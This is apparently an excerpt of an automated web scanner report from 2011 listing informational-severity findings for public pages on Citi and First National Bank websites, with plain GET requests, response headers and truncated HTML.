Date: Wed, 02 Feb 2011 22:00:03 GMT
Content-type: text/html
Connection: close
Content-Length: 14884

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...

25.65. http://www.citi.com/privacy/us_priv.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /privacy/us_priv.htm

Request

GET /privacy/us_priv.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:52 GMT
Content-length: 560
Content-type: text/html
Last-modified: Wed, 27 Oct 2010 13:52:49 GMT
Etag: "230-4cc82eb1"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>CitiMobile</title>
<META HTTP-EQUIV='Pragma' CONTENT='no-cache' />
<META HTTP-EQUIV='Content-Control' CONTENT='no-cache' />
<META HTTP-EQUIV='Cache-Control' CONTENT='no-cache
...[SNIP]...

25.66. http://www.citi.com/resourcs/misc/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /resourcs/misc/styles.css

Request

GET /resourcs/misc/styles.css HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 404 Not found
Server: ""
Date: Wed, 02 Feb 2011 22:16:51 GMT
Content-type: text/html
Connection: close

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...

25.67. http://www.citi.com/track/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /track/

Request

GET /track/ HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 404 Not found
Server: ""
Date: Wed, 02 Feb 2011 22:16:50 GMT
Content-type: text/html
Connection: close

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...

25.68. http://www.citi.com/usc/05/multi/cvg/DPR/TY/April/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /usc/05/multi/cvg/DPR/TY/April/default.htm

Request

GET /usc/05/multi/cvg/DPR/TY/April/default.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 404 Not found
Server: ""
Date: Wed, 02 Feb 2011 22:16:49 GMT
Content-type: text/html
Connection: close

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...

25.69. http://www.citi.com/usc/_spredir.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /usc/_spredir.htm

Request

GET /usc/_spredir.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 404 Not found
Server: ""
Date: Wed, 02 Feb 2011 22:16:48 GMT
Content-type: text/html
Connection: close

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...

25.70. https://www.citicapitaladvisors.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.citicapitaladvisors.com
Path:   /

Request

GET / HTTP/1.1
Host: www.citicapitaladvisors.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:16:55 GMT
Content-length: 872
Content-type: text/html
Last-modified: Wed, 11 Aug 2010 19:03:53 GMT
Etag: "368-4c62f419"
Accept-ranges: bytes
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Citi Alternative Investments</title>
</head>

<script ty
...[SNIP]...

25.71. http://www.firstnational.com/001/html/en/about_us/about_us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/about_us/about_us.html

Request

GET /001/html/en/about_us/about_us.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 27101
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 19:52:54 GMT
Accept-Ranges: bytes
ETag: "0ef117612b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:57 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.72. http://www.firstnational.com/001/html/en/about_us/careers/careers.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/about_us/careers/careers.html

Request

GET /001/html/en/about_us/careers/careers.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 24435
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 19:51:06 GMT
Accept-Ranges: bytes
ETag: "071b23512b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:57 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.73. http://www.firstnational.com/001/html/en/commercial/commercial.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/commercial/commercial.html

Request

GET /001/html/en/commercial/commercial.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 30384
Content-Type: text/html
Last-Modified: Wed, 26 Jan 2011 21:03:07 GMT
Accept-Ranges: bytes
ETag: "80f71a6e9cbdcb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:58 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.74. http://www.firstnational.com/001/html/en/personal/cardproducts/creditcards/credit_card_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/cardproducts/creditcards/credit_card_main.html

Request

GET /001/html/en/personal/cardproducts/creditcards/credit_card_main.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 33557
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:10:37 GMT
Accept-Ranges: bytes
ETag: "80dcaaef14b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:47 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.75. http://www.firstnational.com/001/html/en/personal/cardproducts/gift_cards/giftcards_index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/cardproducts/gift_cards/giftcards_index.html

Request

GET /001/html/en/personal/cardproducts/gift_cards/giftcards_index.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 24300
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:10:41 GMT
Accept-Ranges: bytes
ETag: "8036df214b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:53 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.76. http://www.firstnational.com/001/html/en/personal/faqs/tran/system_technical_requirements.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/faqs/tran/system_technical_requirements.html

Request

GET /001/html/en/personal/faqs/tran/system_technical_requirements.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 30501
Content-Type: text/html
Last-Modified: Tue, 19 Oct 2010 18:15:28 GMT
Accept-Ranges: bytes
ETag: "020949bb96fcb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">
...[SNIP]...

25.77. http://www.firstnational.com/001/html/en/personal/online_serv/account_alerts.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/account_alerts.html

Request

GET /001/html/en/personal/online_serv/account_alerts.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 26280
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:10 GMT
Accept-Ranges: bytes
ETag: "0b9334516b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:20 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.78. http://www.firstnational.com/001/html/en/personal/online_serv/activate_card.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/activate_card.html

Request

GET /001/html/en/personal/online_serv/activate_card.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 23722
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:13 GMT
Accept-Ranges: bytes
ETag: "807cfd4616b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:07 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.79. http://www.firstnational.com/001/html/en/personal/online_serv/credit_card_payments.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/credit_card_payments.html

Request

GET /001/html/en/personal/online_serv/credit_card_payments.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 25884
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:16 GMT
Accept-Ranges: bytes
ETag: "040c74816b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:13 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.80. http://www.firstnational.com/001/html/en/personal/online_serv/online_banking.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/online_banking.html

Request

GET /001/html/en/personal/online_serv/online_banking.html?utm_id=25 HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 26010
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:18 GMT
Accept-Ranges: bytes
ETag: "06df84916b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:16 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.81. http://www.firstnational.com/001/html/en/personal/online_serv/online_billpay.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/online_billpay.html

Request

GET /001/html/en/personal/online_serv/online_billpay.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 25854
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:21 GMT
Accept-Ranges: bytes
ETag: "8030c24b16b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:09 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.82. http://www.firstnational.com/001/html/en/personal/online_serv/online_services.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/online_services.html

Request

GET /001/html/en/personal/online_serv/online_services.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 26475
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:42 GMT
Accept-Ranges: bytes
ETag: "089465816b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:07 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.83. http://www.firstnational.com/001/html/en/personal/online_serv/paperless_statements.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/online_serv/paperless_statements.html

Request

GET /001/html/en/personal/online_serv/paperless_statements.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 26663
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:20:24 GMT
Accept-Ranges: bytes
ETag: "0f48b4d16b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:18 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.84. http://www.firstnational.com/001/html/en/personal/pers_products_serv/banking_accts/banking_accounts.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/pers_products_serv/banking_accts/banking_accounts.html

Request

GET /001/html/en/personal/pers_products_serv/banking_accts/banking_accounts.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 27342
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:21:58 GMT
Accept-Ranges: bytes
ETag: "037938516b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:39 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.85. http://www.firstnational.com/001/html/en/personal/pers_products_serv/banking_accts/checking_accts/checking_accounts.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/pers_products_serv/banking_accts/checking_accts/checking_accounts.html

Request

GET /001/html/en/personal/pers_products_serv/banking_accts/checking_accts/checking_accounts.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 29651
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:21:08 GMT
Accept-Ranges: bytes
ETag: "0d2c56716b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:37 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.86. http://www.firstnational.com/001/html/en/personal/pers_products_serv/first_at_work/firstatwork_program.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/pers_products_serv/first_at_work/firstatwork_program.html

Request

GET /001/html/en/personal/pers_products_serv/first_at_work/firstatwork_program.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 27295
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:22:07 GMT
Accept-Ranges: bytes
ETag: "8081f08a16b8cb1:d88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:46 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.87. http://www.firstnational.com/001/html/en/personal/pers_products_serv/invest_advisory/invest_advisory.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/pers_products_serv/invest_advisory/invest_advisory.html

Request

GET /001/html/en/personal/pers_products_serv/invest_advisory/invest_advisory.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 27271
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:22:36 GMT
Accept-Ranges: bytes
ETag: "08e399c16b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:43 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...

25.88. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html

Request

GET /001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
